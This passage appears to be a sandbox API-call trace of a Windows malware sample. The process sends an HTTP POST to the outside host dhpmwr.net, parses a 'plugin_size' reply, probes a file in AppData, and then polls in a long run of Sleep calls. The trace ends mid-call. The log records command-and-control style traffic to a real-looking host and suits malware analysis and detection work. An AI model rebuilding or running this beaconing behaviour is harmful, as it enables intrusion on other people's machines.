WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeadd0 [0270.909] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x9a80330 [0270.909] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x9a80390 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ba72d3 [0270.909] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a804b0 [0270.909] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x9a804d0 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x468df8af [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x644888f5 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x295601c7 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3aab03ee [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30b91c29 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21546798 [0270.909] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37c89288 [0270.909] wsprintfW (in: param_1=0x9a80390, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://dhpmwr.net/") returned 40 [0270.909] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a804d0) returned 0x17 [0270.909] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a804d0) returned 1 [0270.909] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a804b0) returned 0x12 [0270.910] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a804b0) returned 1 [0270.910] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80330) returned 0x4e [0270.910] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80330) returned 1 [0270.910] WinHttpAddRequestHeaders (hRequest=0x3eeadd0, pwszHeaders="Accept: */*\r\nReferer: http://dhpmwr.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0270.910] WinHttpSendRequest (hRequest=0x3eeadd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9a800f0*, dwOptionalLength=0x7f, dwTotalLength=0x7f, dwContext=0x0) returned 1 [0271.137] WinHttpReceiveResponse (hRequest=0x3eeadd0, lpReserved=0x0) returned 1 [0271.137] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97e4080 [0271.137] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e4080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97e4080*, lpdwNumberOfBytesRead=0x75df668*=0x18) returned 1 [0271.138] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97e4080, Size=0x5000) returned 0x97e4080 [0271.138] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e4098, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97e4098*, lpdwNumberOfBytesRead=0x75df668*=0x0) returned 1 [0271.139] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0271.140] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97e4080) returned 1 [0271.140] WinHttpCloseHandle (hInternet=0x3eeadd0) returned 1 [0271.140] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80390) returned 0x10d [0271.141] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80390) returned 1 [0271.141] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0271.141] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802c0) returned 0x68 [0271.141] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802c0) returned 1 [0271.141] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802a0) returned 0x12 [0271.141] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802a0) returned 1 [0271.141] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0271.141] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80180) returned 0x10c [0271.142] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80180) returned 1 [0271.142] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800a0) returned 0x39 [0271.142] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800a0) returned 1 [0271.142] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800f0) returned 0x88 [0271.142] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800f0) returned 1 [0271.142] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0271.142] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x15) returned 0x9a800a0 [0271.142] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0271.142] lstrlenA (lpString="plugin_size") returned 11 [0271.142] atoi (_Str="0") returned 0 [0271.142] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0271.142] lstrlenA (lpString="|:|") returned 3 [0271.142] MapViewOfFile (hFileMappingObject=0x1380, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2660000 [0271.151] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0271.151] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2660000) returned 0x0 [0271.227] atoi (_Str="0") returned 0 [0271.227] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0271.228] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x26 [0271.228] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0271.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0271.229] Sleep (dwMilliseconds=0x258) [0271.233] Sleep (dwMilliseconds=0x258) [0271.249] Sleep (dwMilliseconds=0x258) [0271.264] Sleep (dwMilliseconds=0x258) [0271.281] Sleep (dwMilliseconds=0x258) [0271.296] Sleep (dwMilliseconds=0x258) [0271.311] Sleep (dwMilliseconds=0x258) [0271.373] Sleep (dwMilliseconds=0x258) [0271.399] Sleep (dwMilliseconds=0x258) [0271.404] Sleep (dwMilliseconds=0x258) [0271.420] Sleep (dwMilliseconds=0x258) [0271.436] Sleep (dwMilliseconds=0x258) [0271.452] Sleep (dwMilliseconds=0x258) [0271.467] Sleep (dwMilliseconds=0x258) [0271.531] Sleep (dwMilliseconds=0x258) [0271.545] Sleep (dwMilliseconds=0x258) [0271.561] Sleep (dwMilliseconds=0x258) [0271.612] Sleep (dwMilliseconds=0x258) [0271.623] Sleep (dwMilliseconds=0x258) [0271.685] Sleep (dwMilliseconds=0x258) [0271.709] Sleep (dwMilliseconds=0x258) [0271.717] Sleep (dwMilliseconds=0x258) [0271.732] Sleep (dwMilliseconds=0x258) [0271.748] Sleep (dwMilliseconds=0x258) [0271.763] Sleep (dwMilliseconds=0x258) [0271.779] Sleep (dwMilliseconds=0x258) [0271.795] Sleep (dwMilliseconds=0x258) [0271.857] Sleep (dwMilliseconds=0x258) [0271.873] Sleep (dwMilliseconds=0x258) [0271.896] Sleep (dwMilliseconds=0x258) [0271.904] Sleep (dwMilliseconds=0x258) [0271.919] Sleep (dwMilliseconds=0x258) [0271.935] Sleep (dwMilliseconds=0x258) [0271.953] Sleep (dwMilliseconds=0x258) [0272.013] Sleep (dwMilliseconds=0x258) [0272.030] Sleep (dwMilliseconds=0x258) [0272.044] Sleep (dwMilliseconds=0x258) [0272.061] Sleep (dwMilliseconds=0x258) [0272.076] Sleep (dwMilliseconds=0x258) [0272.091] Sleep (dwMilliseconds=0x258) [0272.108] Sleep (dwMilliseconds=0x258) [0272.170] Sleep (dwMilliseconds=0x258) [0272.196] Sleep (dwMilliseconds=0x258) [0272.200] Sleep (dwMilliseconds=0x258) [0272.216] Sleep (dwMilliseconds=0x258) [0272.232] Sleep (dwMilliseconds=0x258) [0272.247] Sleep (dwMilliseconds=0x258) [0272.263] Sleep (dwMilliseconds=0x258) [0272.325] Sleep (dwMilliseconds=0x258) [0272.351] Sleep (dwMilliseconds=0x258) [0272.356] Sleep (dwMilliseconds=0x258) [0272.372] Sleep (dwMilliseconds=0x258) [0272.397] Sleep (dwMilliseconds=0x258) [0272.403] Sleep (dwMilliseconds=0x258) [0272.419] Sleep (dwMilliseconds=0x258) [0272.435] Sleep (dwMilliseconds=0x258) [0272.498] Sleep (dwMilliseconds=0x258) [0272.529] Sleep (dwMilliseconds=0x258) [0272.544] Sleep (dwMilliseconds=0x258) [0272.559] Sleep (dwMilliseconds=0x258) [0272.600] Sleep (dwMilliseconds=0x258) [0272.606] Sleep (dwMilliseconds=0x258) [0272.668] Sleep (dwMilliseconds=0x258) [0272.684] Sleep (dwMilliseconds=0x258) [0272.700] Sleep (dwMilliseconds=0x258) [0272.715] Sleep (dwMilliseconds=0x258) [0272.731] Sleep (dwMilliseconds=0x258) [0272.746] Sleep (dwMilliseconds=0x258) [0272.762] Sleep (dwMilliseconds=0x258) [0272.825] Sleep (dwMilliseconds=0x258) [0272.845] Sleep (dwMilliseconds=0x258) [0272.855] Sleep (dwMilliseconds=0x258) [0272.871] Sleep (dwMilliseconds=0x258) [0272.891] Sleep (dwMilliseconds=0x258) [0272.902] Sleep (dwMilliseconds=0x258) [0272.918] Sleep (dwMilliseconds=0x258) [0272.935] Sleep (dwMilliseconds=0x258) [0272.982] Sleep (dwMilliseconds=0x258) [0273.024] Sleep (dwMilliseconds=0x258) [0273.078] Sleep (dwMilliseconds=0x258) [0273.095] Sleep (dwMilliseconds=0x258) [0273.105] Sleep (dwMilliseconds=0x258) [0273.124] Sleep (dwMilliseconds=0x258) [0273.136] Sleep (dwMilliseconds=0x258) [0273.153] Sleep (dwMilliseconds=0x258) [0273.167] Sleep (dwMilliseconds=0x258) [0273.184] Sleep (dwMilliseconds=0x258) [0273.246] Sleep (dwMilliseconds=0x258) [0273.282] Sleep (dwMilliseconds=0x258) [0273.292] Sleep (dwMilliseconds=0x258) [0273.315] Sleep (dwMilliseconds=0x258) [0273.323] Sleep (dwMilliseconds=0x258) [0273.339] Sleep (dwMilliseconds=0x258) [0273.355] Sleep (dwMilliseconds=0x258) [0273.370] Sleep (dwMilliseconds=0x258) [0273.433] Sleep (dwMilliseconds=0x258) [0273.448] Sleep (dwMilliseconds=0x258) [0273.464] Sleep (dwMilliseconds=0x258) [0273.479] Sleep (dwMilliseconds=0x258) [0273.497] Sleep (dwMilliseconds=0x258) [0273.511] Sleep (dwMilliseconds=0x258) [0273.526] Sleep (dwMilliseconds=0x258) [0273.609] Sleep (dwMilliseconds=0x258) [0273.640] Sleep (dwMilliseconds=0x258) [0273.651] Sleep (dwMilliseconds=0x258) [0273.667] Sleep (dwMilliseconds=0x258) [0273.682] Sleep (dwMilliseconds=0x258) [0273.698] Sleep (dwMilliseconds=0x258) [0273.714] Sleep (dwMilliseconds=0x258) [0273.776] Sleep (dwMilliseconds=0x258) [0273.794] Sleep (dwMilliseconds=0x258) [0273.807] Sleep (dwMilliseconds=0x258) [0273.824] Sleep (dwMilliseconds=0x258) [0273.838] Sleep (dwMilliseconds=0x258) [0273.854] Sleep (dwMilliseconds=0x258) [0273.869] Sleep (dwMilliseconds=0x258) [0273.885] Sleep (dwMilliseconds=0x258) [0273.947] Sleep (dwMilliseconds=0x258) [0273.964] Sleep (dwMilliseconds=0x258) [0273.979] Sleep (dwMilliseconds=0x258) [0273.995] Sleep (dwMilliseconds=0x258) [0274.010] Sleep (dwMilliseconds=0x258) [0274.025] Sleep (dwMilliseconds=0x258) [0274.042] Sleep (dwMilliseconds=0x258) [0274.057] Sleep (dwMilliseconds=0x258) [0274.119] Sleep (dwMilliseconds=0x258) [0274.182] Sleep (dwMilliseconds=0x258) [0274.197] Sleep (dwMilliseconds=0x258) [0274.224] Sleep (dwMilliseconds=0x258) [0274.229] Sleep (dwMilliseconds=0x258) [0274.292] Sleep (dwMilliseconds=0x258) [0274.319] Sleep (dwMilliseconds=0x258) [0274.322] Sleep (dwMilliseconds=0x258) [0274.337] Sleep (dwMilliseconds=0x258) [0274.353] Sleep (dwMilliseconds=0x258) [0274.369] Sleep (dwMilliseconds=0x258) [0274.386] Sleep (dwMilliseconds=0x258) [0274.401] Sleep (dwMilliseconds=0x258) [0274.462] Sleep (dwMilliseconds=0x258) [0274.489] Sleep (dwMilliseconds=0x258) [0274.494] Sleep (dwMilliseconds=0x258) [0274.510] Sleep (dwMilliseconds=0x258) [0274.525] Sleep (dwMilliseconds=0x258) [0274.675] Sleep (dwMilliseconds=0x258) [0274.681] Sleep (dwMilliseconds=0x258) [0274.759] Sleep (dwMilliseconds=0x258) [0274.777] Sleep (dwMilliseconds=0x258) [0274.807] Sleep (dwMilliseconds=0x258) [0274.853] Sleep (dwMilliseconds=0x258) [0274.946] Sleep (dwMilliseconds=0x258) [0275.015] Sleep (dwMilliseconds=0x258) [0275.055] Sleep (dwMilliseconds=0x258) [0275.103] Sleep (dwMilliseconds=0x258) [0275.195] Sleep (dwMilliseconds=0x258) [0275.278] Sleep (dwMilliseconds=0x258) [0275.320] Sleep (dwMilliseconds=0x258) [0275.367] Sleep (dwMilliseconds=0x258) [0275.461] Sleep (dwMilliseconds=0x258) [0275.521] Sleep (dwMilliseconds=0x258) [0275.557] Sleep (dwMilliseconds=0x258) [0275.604] Sleep (dwMilliseconds=0x258) [0275.708] Sleep (dwMilliseconds=0x258) [0275.752] Sleep (dwMilliseconds=0x258) [0275.788] Sleep (dwMilliseconds=0x258) [0275.836] Sleep (dwMilliseconds=0x258) [0275.929] Sleep (dwMilliseconds=0x258) [0275.990] Sleep (dwMilliseconds=0x258) [0276.053] Sleep (dwMilliseconds=0x258) [0276.106] Sleep (dwMilliseconds=0x258) [0276.194] Sleep (dwMilliseconds=0x258) [0276.241] Sleep (dwMilliseconds=0x258) [0276.292] Sleep (dwMilliseconds=0x258) [0276.381] Sleep (dwMilliseconds=0x258) [0276.451] Sleep (dwMilliseconds=0x258) [0276.490] Sleep (dwMilliseconds=0x258) [0276.538] Sleep (dwMilliseconds=0x258) [0276.631] Sleep (dwMilliseconds=0x258) [0276.684] Sleep (dwMilliseconds=0x258) [0276.740] Sleep (dwMilliseconds=0x258) [0276.788] Sleep (dwMilliseconds=0x258) [0276.880] Sleep (dwMilliseconds=0x258) [0276.943] Sleep (dwMilliseconds=0x258) [0276.990] Sleep (dwMilliseconds=0x258) [0277.068] Sleep (dwMilliseconds=0x258) [0277.134] Sleep (dwMilliseconds=0x258) [0277.178] Sleep (dwMilliseconds=0x258) [0277.212] Sleep (dwMilliseconds=0x258) [0277.255] Sleep (dwMilliseconds=0x258) [0277.348] Sleep (dwMilliseconds=0x258) [0277.411] Sleep (dwMilliseconds=0x258) [0277.458] Sleep (dwMilliseconds=0x258) [0277.551] Sleep (dwMilliseconds=0x258) [0277.614] Sleep (dwMilliseconds=0x258) [0277.658] Sleep (dwMilliseconds=0x258) [0277.689] Sleep (dwMilliseconds=0x258) [0277.696] Sleep (dwMilliseconds=0x258) [0277.728] Sleep (dwMilliseconds=0x258) [0277.816] Sleep (dwMilliseconds=0x258) [0277.841] Sleep (dwMilliseconds=0x258) [0277.879] Sleep (dwMilliseconds=0x258) [0277.886] Sleep (dwMilliseconds=0x258) [0277.918] Sleep (dwMilliseconds=0x258) [0277.951] Sleep (dwMilliseconds=0x258) [0278.035] Sleep (dwMilliseconds=0x258) [0278.098] Sleep (dwMilliseconds=0x258) [0278.145] Sleep (dwMilliseconds=0x258) [0278.237] Sleep (dwMilliseconds=0x258) [0278.306] Sleep (dwMilliseconds=0x258) [0278.362] Sleep (dwMilliseconds=0x258) [0278.410] Sleep (dwMilliseconds=0x258) [0278.497] Sleep (dwMilliseconds=0x258) [0278.505] Sleep (dwMilliseconds=0x258) [0278.565] Sleep (dwMilliseconds=0x258) [0278.580] Sleep (dwMilliseconds=0x258) [0278.596] Sleep (dwMilliseconds=0x258) [0278.737] Sleep (dwMilliseconds=0x258) [0278.847] Sleep (dwMilliseconds=0x258) [0278.879] Sleep (dwMilliseconds=0x258) [0278.896] Sleep (dwMilliseconds=0x258) [0278.948] Sleep (dwMilliseconds=0x258) [0279.003] Sleep (dwMilliseconds=0x258) [0279.096] Sleep (dwMilliseconds=0x258) [0279.181] Sleep (dwMilliseconds=0x258) [0279.254] Sleep (dwMilliseconds=0x258) [0279.306] Sleep (dwMilliseconds=0x258) [0279.361] Sleep (dwMilliseconds=0x258) [0279.396] Sleep (dwMilliseconds=0x258) [0279.437] Sleep (dwMilliseconds=0x258) [0279.479] Sleep (dwMilliseconds=0x258) [0279.538] Sleep (dwMilliseconds=0x258) [0279.575] Sleep (dwMilliseconds=0x258) [0279.583] Sleep (dwMilliseconds=0x258) [0279.658] Sleep (dwMilliseconds=0x258) [0279.717] Sleep (dwMilliseconds=0x258) [0279.720] Sleep (dwMilliseconds=0x258) [0279.759] Sleep (dwMilliseconds=0x258) [0279.798] Sleep (dwMilliseconds=0x258) [0279.849] Sleep (dwMilliseconds=0x258) [0279.891] Sleep (dwMilliseconds=0x258) [0279.907] Sleep (dwMilliseconds=0x258) [0280.000] Sleep (dwMilliseconds=0x258) [0280.095] Sleep (dwMilliseconds=0x258) [0280.141] Sleep (dwMilliseconds=0x258) [0280.187] Sleep (dwMilliseconds=0x258) [0280.250] Sleep (dwMilliseconds=0x258) [0280.265] Sleep (dwMilliseconds=0x258) [0280.281] Sleep (dwMilliseconds=0x258) [0280.304] Sleep (dwMilliseconds=0x258) [0280.312] Sleep (dwMilliseconds=0x258) [0280.328] Sleep (dwMilliseconds=0x258) [0280.344] Sleep (dwMilliseconds=0x258) [0280.407] Sleep (dwMilliseconds=0x258) [0280.425] Sleep (dwMilliseconds=0x258) [0280.437] Sleep (dwMilliseconds=0x258) [0280.453] Sleep (dwMilliseconds=0x258) [0280.468] Sleep (dwMilliseconds=0x258) [0280.484] Sleep (dwMilliseconds=0x258) [0280.499] Sleep (dwMilliseconds=0x258) [0280.516] Sleep (dwMilliseconds=0x258) [0280.578] Sleep (dwMilliseconds=0x258) [0280.593] Sleep (dwMilliseconds=0x258) [0280.609] Sleep (dwMilliseconds=0x258) [0280.625] Sleep (dwMilliseconds=0x258) [0280.651] Sleep (dwMilliseconds=0x258) [0280.655] Sleep (dwMilliseconds=0x258) [0280.671] Sleep (dwMilliseconds=0x258) [0280.812] Sleep (dwMilliseconds=0x258) [0280.865] Sleep (dwMilliseconds=0x258) [0280.906] Sleep (dwMilliseconds=0x258) [0280.952] Sleep (dwMilliseconds=0x258) [0281.046] Sleep (dwMilliseconds=0x258) [0281.078] Sleep (dwMilliseconds=0x258) [0281.141] Sleep (dwMilliseconds=0x258) [0281.186] Sleep (dwMilliseconds=0x258) [0281.260] Sleep (dwMilliseconds=0x258) [0281.265] Sleep (dwMilliseconds=0x258) [0281.325] Sleep (dwMilliseconds=0x258) [0281.326] Sleep (dwMilliseconds=0x258) [0281.365] Sleep (dwMilliseconds=0x258) [0281.483] Sleep (dwMilliseconds=0x258) [0281.545] Sleep (dwMilliseconds=0x258) [0281.591] Sleep (dwMilliseconds=0x258) [0281.670] Sleep (dwMilliseconds=0x258) [0281.763] Sleep (dwMilliseconds=0x258) [0281.826] Sleep (dwMilliseconds=0x258) [0281.873] Sleep (dwMilliseconds=0x258) [0281.967] Sleep (dwMilliseconds=0x258) [0281.997] Sleep (dwMilliseconds=0x258) [0282.015] Sleep (dwMilliseconds=0x258) [0282.028] Sleep (dwMilliseconds=0x258) [0282.044] Sleep (dwMilliseconds=0x258) [0282.059] Sleep (dwMilliseconds=0x258) [0282.076] Sleep (dwMilliseconds=0x258) [0282.138] Sleep (dwMilliseconds=0x258) [0282.153] Sleep (dwMilliseconds=0x258) [0282.169] Sleep (dwMilliseconds=0x258) [0282.185] Sleep (dwMilliseconds=0x258) [0282.200] Sleep (dwMilliseconds=0x258) [0282.215] Sleep (dwMilliseconds=0x258) [0282.231] Sleep (dwMilliseconds=0x258) [0282.278] Sleep (dwMilliseconds=0x258) [0282.301] Sleep (dwMilliseconds=0x258) [0282.309] Sleep (dwMilliseconds=0x258) [0282.324] Sleep (dwMilliseconds=0x258) [0282.340] Sleep (dwMilliseconds=0x258) [0282.356] Sleep (dwMilliseconds=0x258) [0282.371] Sleep (dwMilliseconds=0x258) [0282.387] Sleep (dwMilliseconds=0x258) [0282.449] Sleep (dwMilliseconds=0x258) [0282.468] Sleep (dwMilliseconds=0x258) [0282.481] Sleep (dwMilliseconds=0x258) [0282.496] Sleep (dwMilliseconds=0x258) [0282.527] Sleep (dwMilliseconds=0x258) [0282.543] Sleep (dwMilliseconds=0x258) [0282.559] Sleep (dwMilliseconds=0x258) [0282.723] Sleep (dwMilliseconds=0x258) [0282.796] Sleep (dwMilliseconds=0x258) [0282.840] Sleep (dwMilliseconds=0x258) [0282.888] Sleep (dwMilliseconds=0x258) [0282.988] Sleep (dwMilliseconds=0x258) [0283.054] Sleep (dwMilliseconds=0x258) [0283.090] Sleep (dwMilliseconds=0x258) [0283.138] Sleep (dwMilliseconds=0x258) [0283.233] Sleep (dwMilliseconds=0x258) [0283.308] Sleep (dwMilliseconds=0x258) [0283.354] Sleep (dwMilliseconds=0x258) [0283.449] Sleep (dwMilliseconds=0x258) [0283.511] Sleep (dwMilliseconds=0x258) [0283.558] Sleep (dwMilliseconds=0x258) [0283.651] Sleep (dwMilliseconds=0x258) [0283.721] Sleep (dwMilliseconds=0x258) [0283.823] Sleep (dwMilliseconds=0x258) [0283.916] Sleep (dwMilliseconds=0x258) [0283.994] Sleep (dwMilliseconds=0x258) [0284.041] Sleep (dwMilliseconds=0x258) [0284.105] Sleep (dwMilliseconds=0x258) [0284.122] Sleep (dwMilliseconds=0x258) [0284.154] Sleep (dwMilliseconds=0x258) [0284.240] Sleep (dwMilliseconds=0x258) [0284.275] Sleep (dwMilliseconds=0x258) [0284.300] Sleep (dwMilliseconds=0x258) [0284.306] Sleep (dwMilliseconds=0x258) [0284.321] Sleep (dwMilliseconds=0x258) [0284.337] Sleep (dwMilliseconds=0x258) [0284.353] Sleep (dwMilliseconds=0x258) [0284.368] Sleep (dwMilliseconds=0x258) [0284.384] Sleep (dwMilliseconds=0x258) [0284.446] Sleep (dwMilliseconds=0x258) [0284.463] Sleep (dwMilliseconds=0x258) [0284.478] Sleep (dwMilliseconds=0x258) [0284.493] Sleep (dwMilliseconds=0x258) [0284.509] Sleep (dwMilliseconds=0x258) [0284.524] Sleep (dwMilliseconds=0x258) [0284.540] Sleep (dwMilliseconds=0x258) [0284.555] Sleep (dwMilliseconds=0x258) [0284.618] Sleep (dwMilliseconds=0x258) [0284.633] Sleep (dwMilliseconds=0x258) [0284.650] Sleep (dwMilliseconds=0x258) [0284.665] Sleep (dwMilliseconds=0x258) [0284.680] Sleep (dwMilliseconds=0x258) [0284.696] Sleep (dwMilliseconds=0x258) [0284.712] Sleep (dwMilliseconds=0x258) [0284.789] Sleep (dwMilliseconds=0x258) [0284.805] Sleep (dwMilliseconds=0x258) [0284.821] Sleep (dwMilliseconds=0x258) [0284.836] Sleep (dwMilliseconds=0x258) [0284.872] Sleep (dwMilliseconds=0x258) [0284.883] Sleep (dwMilliseconds=0x258) [0284.939] Sleep (dwMilliseconds=0x258) [0284.956] Sleep (dwMilliseconds=0x258) [0284.961] Sleep (dwMilliseconds=0x258) [0284.978] Sleep (dwMilliseconds=0x258) [0284.992] Sleep (dwMilliseconds=0x258) [0285.008] Sleep (dwMilliseconds=0x258) [0285.023] Sleep (dwMilliseconds=0x258) [0285.039] Sleep (dwMilliseconds=0x258) [0285.102] Sleep (dwMilliseconds=0x258) [0285.118] Sleep (dwMilliseconds=0x258) [0285.133] Sleep (dwMilliseconds=0x258) [0285.149] Sleep (dwMilliseconds=0x258) [0285.165] Sleep (dwMilliseconds=0x258) [0285.179] Sleep (dwMilliseconds=0x258) [0285.196] Sleep (dwMilliseconds=0x258) [0285.257] Sleep (dwMilliseconds=0x258) [0285.273] Sleep (dwMilliseconds=0x258) [0285.289] Sleep (dwMilliseconds=0x258) [0285.305] Sleep (dwMilliseconds=0x258) [0285.320] Sleep (dwMilliseconds=0x258) [0285.335] Sleep (dwMilliseconds=0x258) [0285.351] Sleep (dwMilliseconds=0x258) [0285.414] Sleep (dwMilliseconds=0x258) [0285.429] Sleep (dwMilliseconds=0x258) [0285.445] Sleep (dwMilliseconds=0x258) [0285.460] Sleep (dwMilliseconds=0x258) [0285.476] Sleep (dwMilliseconds=0x258) [0285.492] Sleep (dwMilliseconds=0x258) [0285.508] Sleep (dwMilliseconds=0x258) [0285.523] Sleep (dwMilliseconds=0x258) [0285.571] Sleep (dwMilliseconds=0x258) [0285.596] Sleep (dwMilliseconds=0x258) [0285.601] Sleep (dwMilliseconds=0x258) [0285.616] Sleep (dwMilliseconds=0x258) [0285.632] Sleep (dwMilliseconds=0x258) [0285.647] Sleep (dwMilliseconds=0x258) [0285.663] Sleep (dwMilliseconds=0x258) [0285.679] Sleep (dwMilliseconds=0x258) [0285.742] Sleep (dwMilliseconds=0x258) [0285.777] Sleep (dwMilliseconds=0x258) [0285.788] Sleep (dwMilliseconds=0x258) [0285.803] Sleep (dwMilliseconds=0x258) [0285.823] Sleep (dwMilliseconds=0x258) [0285.835] Sleep (dwMilliseconds=0x258) [0285.897] Sleep (dwMilliseconds=0x258) [0285.913] Sleep (dwMilliseconds=0x258) [0285.928] Sleep (dwMilliseconds=0x258) [0285.944] Sleep (dwMilliseconds=0x258) [0285.964] Sleep (dwMilliseconds=0x258) [0285.975] Sleep (dwMilliseconds=0x258) [0285.991] Sleep (dwMilliseconds=0x258) [0286.053] Sleep (dwMilliseconds=0x258) [0286.077] Sleep (dwMilliseconds=0x258) [0286.084] Sleep (dwMilliseconds=0x258) [0286.100] Sleep (dwMilliseconds=0x258) [0286.117] Sleep (dwMilliseconds=0x258) [0286.131] Sleep (dwMilliseconds=0x258) [0286.152] Sleep (dwMilliseconds=0x258) [0286.211] Sleep (dwMilliseconds=0x258) [0286.225] Sleep (dwMilliseconds=0x258) [0286.240] Sleep (dwMilliseconds=0x258) [0286.256] Sleep (dwMilliseconds=0x258) [0286.272] Sleep (dwMilliseconds=0x258) [0286.287] Sleep (dwMilliseconds=0x258) [0286.303] Sleep (dwMilliseconds=0x258) [0286.365] Sleep (dwMilliseconds=0x258) [0286.381] Sleep (dwMilliseconds=0x258) [0286.398] Sleep (dwMilliseconds=0x258) [0286.412] Sleep (dwMilliseconds=0x258) [0286.428] Sleep (dwMilliseconds=0x258) [0286.443] Sleep (dwMilliseconds=0x258) [0286.466] Sleep (dwMilliseconds=0x258) [0286.521] Sleep (dwMilliseconds=0x258) [0286.537] Sleep (dwMilliseconds=0x258) [0286.552] Sleep (dwMilliseconds=0x258) [0286.568] Sleep (dwMilliseconds=0x258) [0286.584] Sleep (dwMilliseconds=0x258) [0286.599] Sleep (dwMilliseconds=0x258) [0286.615] Sleep (dwMilliseconds=0x258) [0286.677] Sleep (dwMilliseconds=0x258) [0286.693] Sleep (dwMilliseconds=0x258) [0286.708] Sleep (dwMilliseconds=0x258) [0286.724] Sleep (dwMilliseconds=0x258) [0286.739] Sleep (dwMilliseconds=0x258) [0286.795] Sleep (dwMilliseconds=0x258) [0286.834] Sleep (dwMilliseconds=0x258) [0286.865] Sleep (dwMilliseconds=0x258) [0286.880] Sleep (dwMilliseconds=0x258) [0286.897] Sleep (dwMilliseconds=0x258) [0286.911] Sleep (dwMilliseconds=0x258) [0286.927] Sleep (dwMilliseconds=0x258) [0286.943] Sleep (dwMilliseconds=0x258) [0286.958] Sleep (dwMilliseconds=0x258) [0287.021] Sleep (dwMilliseconds=0x258) [0287.036] Sleep (dwMilliseconds=0x258) [0287.052] Sleep (dwMilliseconds=0x258) [0287.067] Sleep (dwMilliseconds=0x258) [0287.083] Sleep (dwMilliseconds=0x258) [0287.098] Sleep (dwMilliseconds=0x258) [0287.114] Sleep (dwMilliseconds=0x258) [0287.176] Sleep (dwMilliseconds=0x258) [0287.192] Sleep (dwMilliseconds=0x258) [0287.207] Sleep (dwMilliseconds=0x258) [0287.223] Sleep 